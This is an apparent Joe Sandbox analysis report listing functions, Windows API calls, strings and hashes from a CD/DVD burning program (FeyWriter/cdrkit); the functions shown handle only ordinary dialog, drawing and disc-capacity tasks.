Instruction ID: f9a55b1458717276f0287edbe39237f85a816e2d106793d26282e9a58170d1a8
Opcode Fuzzy Hash: 6bda259f35190cd4bf27519d42827f834eadd37d55460c6c8f99338a76d9e45b
Instruction Fuzzy Hash: F93139B1204300AFD254DB66DD95F2BB7E8FBCDB04F104A1DF54993250DA74E8018B6A

Function 0043E940 Relevance: 13.6, APIs: 9, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0043E94D

Part of subcall function 00415440: GetWindowLongW.USER32(?,000000F0), ref: 00415452
Part of subcall function 00415440: GetParent.USER32 ref: 00415473
Part of subcall function 00415440: GetWindowRect.USER32(?,?), ref: 0041548C
Part of subcall function 00415440: GetWindowLongW.USER32(?,000000F0), ref: 004154A1
Part of subcall function 00415440: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004154C2

LoadIconW.USER32(00000000,00007F01), ref: 0043E969
LoadIconW.USER32(00000000,00007F03), ref: 0043E98C
SetWindowTextW.USER32(00000000,00000000), ref: 0043E9C1
GetDlgItem.USER32(?,000003FE), ref: 0043E9D5
SendMessageW.USER32(00000000,00000170,00000000,00000000), ref: 0043E9E0
GetDlgItem.USER32(00000000,00000002), ref: 0043EA03
EnableWindow.USER32(00000000,00000000), ref: 0043EA08

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Window$IconItemLoadLongParent$EnableInfoMessageParametersRectSendSystemText
String ID:
API String ID: 2335630793-0
Opcode ID: 16b74f4d7b4d8aa616c16c7d3a20a5f21df54ad38499f29f7cd0393523157883
Instruction ID: 1bdc4b3917e5cf7a6da076c526d40e832993c7f514f5b0fb6708785e6e0e237f
Opcode Fuzzy Hash: 16b74f4d7b4d8aa616c16c7d3a20a5f21df54ad38499f29f7cd0393523157883
Instruction Fuzzy Hash: 9F21D8B07443007BE6506BA6DD5AF6773ACAF88B09F100429F709973D1D6A9A801875D

Function 00457060 Relevance: 13.6, APIs: 9, Instructions: 77windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00457071
EnableWindow.USER32(00000000,00000001), ref: 0045707C
GetDlgItem.USER32(?,00000001), ref: 00457084
SendMessageW.USER32(?,00000028,00000000,00000000), ref: 0045708F
GetDlgItem.USER32(?,00000002), ref: 0045709B
EnableWindow.USER32(00000000,00000000), ref: 004570A0
GetParent.USER32(?), ref: 004570EC
SetWindowTextW.USER32(00000000,?), ref: 004570FA
PostMessageW.USER32(?,00008001,00000000,00000000), ref: 0045712D

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ItemWindow$EnableMessage$ParentPostSendText
String ID:
API String ID: 2195773501-0
Opcode ID: 3c33603149ab94b78e3195b4d33da2e2bbc08a43da34cf42d15ce05fe1966308
Instruction ID: 764916a4737c6fe3910fe91d89693e0d879b4547064f2de230254b1f85a39ee7
Opcode Fuzzy Hash: 3c33603149ab94b78e3195b4d33da2e2bbc08a43da34cf42d15ce05fe1966308
Instruction Fuzzy Hash: 84219571640700BBE7309BA4DC4EF67B3ECAF84710F14891DF699972C1CAB8A445CB68

Function 00468D20 Relevance: 13.6, APIs: 9, Instructions: 67COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(00000011), ref: 00468D2B
SelectObject.GDI32(?,00000000), ref: 00468D3D
GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 00468D54
FillRect.USER32(?,?,?), ref: 00468D92
SetBkColor.GDI32(?,00FFFFFF), ref: 00468D9E
GetSysColor.USER32(00000008), ref: 00468DA6
SetTextColor.GDI32(?,00000000), ref: 00468DAE
DrawTextW.USER32(?,?,?,?,00008020), ref: 00468DC7
SelectObject.GDI32(?,?), ref: 00468DD3

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ColorObjectText$Select$DrawExtentFillPoint32RectStock
String ID:
API String ID: 1045733339-0
Opcode ID: 7bdfceeb92a1d315195a26aafe2d96bb5e66b074ef2a87e3c646fc43dba2270a
Instruction ID: 921cba5d7a713325c16ca5f1c657146447e50d8a7f528260608bbaf95052ba01
Opcode Fuzzy Hash: 7bdfceeb92a1d315195a26aafe2d96bb5e66b074ef2a87e3c646fc43dba2270a
Instruction Fuzzy Hash: DB21F875104700AFD344DF65DD94D6BB7F8FBC9610F004A2DFA9683690DB30A9058B66

Function 004627A0 Relevance: 13.6, APIs: 9, Instructions: 64COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,0000049A), ref: 004627B5
CheckDlgButton.USER32(?,00000489), ref: 004627D1
GetDlgItem.USER32(?,00000498), ref: 004627E8
EnableWindow.USER32(00000000,00000000), ref: 004627ED
CheckDlgButton.USER32(?,00000498,00000000), ref: 00462810
GetDlgItem.USER32(?,00000499), ref: 00462821
EnableWindow.USER32(00000000,00000000), ref: 00462826
GetDlgItem.USER32(?,0000049A), ref: 00462831
EnableWindow.USER32(00000000,00000000), ref: 00462836

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Item$EnableWindow$ButtonCheck
String ID:
API String ID: 4279889051-0
Opcode ID: 461f561fd35582ac3f4f16d8841999f1259f17da57a6c3219e6fcb73680e5bb1
Instruction ID: 6f2fcdca3d881243a9fe89159858dfd254a8c9ab6302c4eae7f459f450da80d4
Opcode Fuzzy Hash: 461f561fd35582ac3f4f16d8841999f1259f17da57a6c3219e6fcb73680e5bb1
Instruction Fuzzy Hash: 9811CAF9640B407BE220A7798D85F2777ECAB95B00F00892DF346976C1C5A8F801877C

Function 0042D0C0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 482COMMON

Download Yara Rule

APIs

Part of subcall function 0042C800: _memset.LIBCMT ref: 0042C832

_memset.LIBCMT ref: 0042D124
_memset.LIBCMT ref: 0042D24B
_memset.LIBCMT ref: 0042D370
_memset.LIBCMT ref: 0042D4B4
_memset.LIBCMT ref: 0042D5D9

Strings

Z, xrefs: 0042D605
U, xrefs: 0042D6D0

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: _memset
String ID: U$Z
API String ID: 2102423945-4016073733
Opcode ID: 7aeb2e3523bbfb6ea240956ece7115a3661a228d24d3cb8a8f77ad9b3cd3f1a8
Instruction ID: ccedf43c1970e7b3f7befb02d4f2c4d6c92b093785b9c33c69847e66f97510da
Opcode Fuzzy Hash: 7aeb2e3523bbfb6ea240956ece7115a3661a228d24d3cb8a8f77ad9b3cd3f1a8
Instruction Fuzzy Hash: 24128E7051D3C0AED341CB29849169FBFE4AFDA318F845E5EF6D487282D2758508CB27

Function 004304C0 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 179COMMON

Download Yara Rule

APIs

Part of subcall function 00444320: IsWindow.USER32(?), ref: 00444336
Part of subcall function 00444320: _vswprintf_s.LIBCMT ref: 0044435A
Part of subcall function 00444320: GetWindowTextLengthW.USER32(?), ref: 0044436C
Part of subcall function 00444320: SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0044437F
Part of subcall function 00444320: SendMessageW.USER32(?,000000B7,00000000,00000000), ref: 0044438E
Part of subcall function 00444320: SendMessageW.USER32(?,000000C2,00000000,AD5E02B4), ref: 0044439C
Part of subcall function 00444320: GetWindowTextLengthW.USER32(?), ref: 004443A2
Part of subcall function 00444320: SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004443AF
Part of subcall function 00444320: SendMessageW.USER32(?,000000B7,00000000,00000000), ref: 004443BE
Part of subcall function 00444320: SendMessageW.USER32(?,000000C2,00000000,004C91E0), ref: 004443D0
Part of subcall function 00444320: lstrlenW.KERNEL32(AD5E02B4), ref: 004443E4

_memset.LIBCMT ref: 00430514

Part of subcall function 0042E510: _memset.LIBCMT ref: 0042E828
Part of subcall function 0042E510: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 0042E8A1
Part of subcall function 0042E510: ResetEvent.KERNEL32(00000000), ref: 0042E8AA
Part of subcall function 0042E510: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,0000005C,?,?,?), ref: 0042E8C8
Part of subcall function 0042E510: CloseHandle.KERNEL32(00000000,?,00000000,0000005C,?,?,?), ref: 0042E8CF
Part of subcall function 0042E510: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,0000005C,?,?,?), ref: 0042E8DC

Strings

CCore2Info::GetTotalDiscCapacity, xrefs: 004304ED
#, xrefs: 00430639
Error: Invalid capacity list length., xrefs: 004306F8
No media present., xrefs: 00430660
Capacity list length: %d bytes., xrefs: 004305D0
Current profile: 0x%.4X., xrefs: 00430573

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$Window$EventLengthText_memset$CloseCreateErrorHandleLastObjectResetSingleWait_vswprintf_slstrlen
String ID: Capacity list length: %d bytes.$ Current profile: 0x%.4X.$ Error: Invalid capacity list length.$ No media present.$#$CCore2Info::GetTotalDiscCapacity
API String ID: 4114971398-3369073106
Opcode ID: d7ae4284b6b648c7502a4a5e65849768368f73aaa41c67371f843bd6cf7d4438
Instruction ID: b4ad1001593ccd09b326c45b7d7f5b2383757b58dd7c55d9fc9284aa820bea84
Opcode Fuzzy Hash: d7ae4284b6b648c7502a4a5e65849768368f73aaa41c67371f843bd6cf7d4438
Instruction Fuzzy Hash: ED51D57060C3906FD350DB25885176FBBE4ABDD308F449A2FF9D997282D27C86098B66

Function 004649E0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168stringCOMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000103,?,AD5E0258), ref: 00464A6E

Part of subcall function 00422080: std::runtime_error::runtime_error.LIBCPMTD ref: 004220EC
Part of subcall function 00422080: __CxxThrowException@8.LIBCMT ref: 00422103

GetModuleFileNameW.KERNEL32(00000000,?,00000103,FeyWriter Projects|.irp,00000017,Raw Images|.bin, .raw,00000015), ref: 00464BDD
lstrcatW.KERNEL32(?,cdrkit\), ref: 00464BF2

Strings

Raw Images|.bin, .raw, xrefs: 00464AF1
Disc Images|.iso, .cue, xrefs: 00464A78
FeyWriter Projects|.irp, xrefs: 00464B67
cdrkit\, xrefs: 00464BEC

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Exception@8FileModuleNamePathTempThrowlstrcatstd::runtime_error::runtime_error
String ID: Disc Images|.iso, .cue$FeyWriter Projects|.irp$Raw Images|.bin, .raw$cdrkit\
API String ID: 292977688-1539404145
Opcode ID: b2b8d427e563fda0930a4511d3e5ba6d87723d4b6f8b2cb58f42bb3713e02170
Instruction ID: 81df6d3022ed1fa44ad059efdcc8830eafed06419a83a3f3792789824ad3ca78
Opcode Fuzzy Hash: b2b8d427e563fda0930a4511d3e5ba6d87723d4b6f8b2cb58f42bb3713e02170
Instruction Fuzzy Hash: B061BCB1208380EFD314DF25C855B5BBBE4AFA5708F44891EF48947291D7B9E908CB6B

Function 004180E0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 164threadCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 0041812A

Part of subcall function 00449E80: PropertySheetW.COMCTL32(?,74E2F860,?,00000000,00416D22,00000000), ref: 00449EB9

EnableWindow.USER32(?,00000000), ref: 00418222
IsWindow.USER32(?), ref: 00418281
ShowWindow.USER32(?,00000001), ref: 004182A0
CreateThread.KERNEL32(00000000,00000000,Function_00015DB0,00000000,00000000,00000000), ref: 004182EF
CloseHandle.KERNEL32(00000000), ref: 004182F6

Strings

(HL, xrefs: 00418259, 0041825D

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Window$ActiveCloseCreateEnableHandlePropertySheetShowThread
String ID: (HL
API String ID: 3085227597-2396325628
Opcode ID: 72f27b4cb873b48efe0694ba6b0edc44f0be411afa72879e5aa683243db4d190
Instruction ID: 114f6a0fd335944529abef7ca66b7841006c9af61c5872e79749939f51d0404d
Opcode Fuzzy Hash: 72f27b4cb873b48efe0694ba6b0edc44f0be411afa72879e5aa683243db4d190
Instruction Fuzzy Hash: DD51C5711087809BC320EF659895AAFB7E4FFD4305F500A2EF59593292DF785848CB6E

Function 0041A190 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 138threadCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 0041A1FC

Part of subcall function 00449E80: PropertySheetW.COMCTL32(?,74E2F860,?,00000000,00416D22,00000000), ref: 00449EB9

EnableWindow.USER32(?,00000000), ref: 0041A237
IsWindow.USER32(?), ref: 0041A296
ShowWindow.USER32(?,00000001), ref: 0041A2B4
CreateThread.KERNEL32(00000000,00000000,Function_00018DA0,?,00000000,?), ref: 0041A309
CloseHandle.KERNEL32(00000000,?,00000000,?,?,004F19D0), ref: 0041A310

Strings

(HL, xrefs: 0041A26E, 0041A272

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Window$ActiveCloseCreateEnableHandlePropertySheetShowThread
String ID: (HL
API String ID: 3085227597-2396325628
Opcode ID: d29621e347dcbc404b7f99c0fa2237cac8a60646657b865b563892bae8b78b14
Instruction ID: 1086cf47fc4c31fd8eb37891f92d6b40be6bf9ca44e9e16b5a653012215f4776
Opcode Fuzzy Hash: d29621e347dcbc404b7f99c0fa2237cac8a60646657b865b563892bae8b78b14
Instruction Fuzzy Hash: EA41B5B1508344AFD310EF659895EAFBBD8FBC5304F40092EF58593381DB799844CBAA

Function 00463030 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

SetDlgItemTextW.USER32(?,00000001,?), ref: 00463079
SetDlgItemTextW.USER32(?,00000002,?), ref: 00463098
SetWindowTextW.USER32(?,?), ref: 004630B8
SetDlgItemTextW.USER32(?,00000462,?), ref: 004630E1
SetDlgItemTextW.USER32(?,0000048E,?), ref: 00463106
SetDlgItemTextW.USER32(?,00000490,?), ref: 0046312B

Strings

savetracks, xrefs: 00463045

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Text$Item$Window
String ID: savetracks
API String ID: 820206838-2482156498
Opcode ID: 898eb20e6be7f408fcb5868c65617c0711be5a4f519ab1fec5a303c9c7905626
Instruction ID: 27ea484af19077148c70105d27bb93ad7c3351d816ed646da002cc6df9008d33
Opcode Fuzzy Hash: 898eb20e6be7f408fcb5868c65617c0711be5a4f519ab1fec5a303c9c7905626
Instruction Fuzzy Hash: 1C2191B92043007FD618EF50CC82EBB739ADBC4714F10C96EBA564B386EA75E8098B15

Function 0044E240 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 77windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0044E24D
SendMessageW.USER32(00000000,0000040C,00000000,00000000), ref: 0044E265
_memset.LIBCMT ref: 0044E290
SendMessageW.USER32(00000000,0000041C,00000000,?), ref: 0044E2A4
PostMessageW.USER32(00000000,0000042B,00000000,00000000), ref: 0044E2DD
PostMessageW.USER32(?,00000100,00000028,00000000), ref: 0044E2EC

Strings

P, xrefs: 0044E280

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Message$PostSend$Parent_memset
String ID: P
API String ID: 2781538653-3110715001
Opcode ID: c2b16832401ce91f65e87ccbcdc067d26f40e5332fd2f727cd99bce78088f291
Instruction ID: abdc5c60b0511d257eda4ebf21eb7e8a2ce306ffd067e89059c9014cd5731b0d
Opcode Fuzzy Hash: c2b16832401ce91f65e87ccbcdc067d26f40e5332fd2f727cd99bce78088f291
Instruction Fuzzy Hash: E811E97274031077E6109B559C82FABB7D8FB88B51F14446AFB04EB1C0C7E9E4099BAA

Function 004265D0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 75COMMON

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 004265EE
_strncmp.LIBCMT ref: 00426626
_swscanf.LIBCMT ref: 00426650

Strings

Starting to write CD/DVD, xrefs: 004265E6
Last chance to quit, starting %s write in %d seconds., xrefs: 00426640
Last chance, xrefs: 00426620
d, xrefs: 00426662

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: _strncmp$_swscanf
String ID: Last chance$Last chance to quit, starting %s write in %d seconds.$Starting to write CD/DVD$d
API String ID: 3955417911-1479444047
Opcode ID: 8e01beeddc99c4f0584dee454cee1f3fe39c9f22e45e85f44600dda5e0f52b02
Instruction ID: 5bab0bfdcfdd05a194e5c0c08d32a3ab1ec1b4839870f13354e4d402ad8e2e52
Opcode Fuzzy Hash: 8e01beeddc99c4f0584dee454cee1f3fe39c9f22e45e85f44600dda5e0f52b02
Instruction Fuzzy Hash: 57213EB2A043006FE710DB29D842F9BFBD49FE4314F44492FF55947251E974A458CBAB

Function 00432930 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71windowCOMMON

Download Yara Rule

APIs

SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0043294D
_memset.LIBCMT ref: 00432964
